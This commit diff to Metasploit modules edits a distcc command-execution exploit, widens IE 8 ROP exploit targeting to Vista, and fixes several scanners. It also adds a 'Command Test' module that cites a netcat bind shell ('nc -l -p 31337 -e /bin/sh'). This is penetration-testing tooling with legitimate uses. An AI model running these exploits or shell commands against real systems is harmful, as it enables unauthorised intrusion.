Merge branch 'master' into feature/vuln-info
commit
073205a875
|
@ -54,6 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]),
|
||||
OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]),
|
||||
OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -468,6 +469,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run
|
||||
@res = Net::DNS::Resolver.new()
|
||||
if datastore['TCP_DNS']
|
||||
vprint_status("Using DNS/TCP")
|
||||
@res.use_tcp = true
|
||||
end
|
||||
@res.retry = datastore['RETRY'].to_i
|
||||
@res.retry_interval = datastore['RETRY_INTERVAL'].to_i
|
||||
@threadnum = datastore['THREADS'].to_i
|
||||
|
|
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
::Timeout.timeout(to) do
|
||||
res = connect
|
||||
# This makes db_services look a lot nicer.
|
||||
banner_santized = Rex::Text.to_hex_ascii(banner.to_s.unpack('C*').pack('U*'))
|
||||
banner_santized = Rex::Text.to_hex_ascii(banner.to_s)
|
||||
print_status("#{ip}:#{rport} TELNET #{banner_santized}")
|
||||
report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_santized)
|
||||
end
|
||||
|
|
|
@ -63,6 +63,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
r = rand_text_alphanumeric(10)
|
||||
connect
|
||||
sock.put(dist_cmd("sh", "-c", "echo #{r}"))
|
||||
|
||||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
err, out = read_output
|
||||
if out.index(r)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
@ -72,6 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
err, out = read_output
|
||||
|
||||
(err || "").split("\n") do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
(out || "").split("\n") do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def read_output
|
||||
|
||||
res = sock.get_once(24, 5)
|
||||
|
||||
if !(res and res.length == 24)
|
||||
|
@ -85,12 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
return [nil, nil] if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
err = sock.get_once(len, 5)
|
||||
end
|
||||
|
||||
# Check STDOUT
|
||||
|
@ -98,16 +125,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
return [err, nil] if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
out = sock.get_once(len, 5)
|
||||
end
|
||||
return [err, out]
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
[
|
||||
'IE 8 on Windows 7 SP1 with JRE ROP',
|
||||
'IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RopOffset' => '0x5f4',
|
||||
|
@ -95,8 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
|
||||
# Windows XP SP3 + IE 8.0
|
||||
return targets[1]
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
|
||||
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8\.0/
|
||||
# Windows 7 SP1 + IE 8.0
|
||||
# Vista SP2 + IE 8.0
|
||||
return targets[3]
|
||||
else
|
||||
return nil
|
||||
|
|
|
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
[
|
||||
'IE 8 with Java 6 on Windows 7 SP1',
|
||||
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RopChainOffset' => '0x5f4',
|
||||
|
@ -125,8 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return targets[2] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[3] #IE 8 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
|
||||
return targets[5] #IE 8 on Windows 7 SP1
|
||||
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
|
||||
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
|
|
@ -25,22 +25,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'modpr0be<modpr0be@spentera.com>', # Original discovery and Metasploit module
|
||||
'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '19266' ],
|
||||
[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ],
|
||||
[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'seh',
|
||||
'ExitFunction' => 'seh'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
|
||||
'DisableNops' => true,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
|
@ -0,0 +1,60 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Command Test',
|
||||
'Description' => %q{
|
||||
This module tests cmd payloads by targeting (for example) a server
|
||||
like: nc -l -p 31337 -e /bin/sh
|
||||
},
|
||||
'Author' => 'egypt',
|
||||
'Version' => '$Revision$',
|
||||
'References' => [ ],
|
||||
'DefaultOptions' => { },
|
||||
'Payload' =>
|
||||
{
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Targeting', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(31337),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
sock.put(payload.encoded + "\n")
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue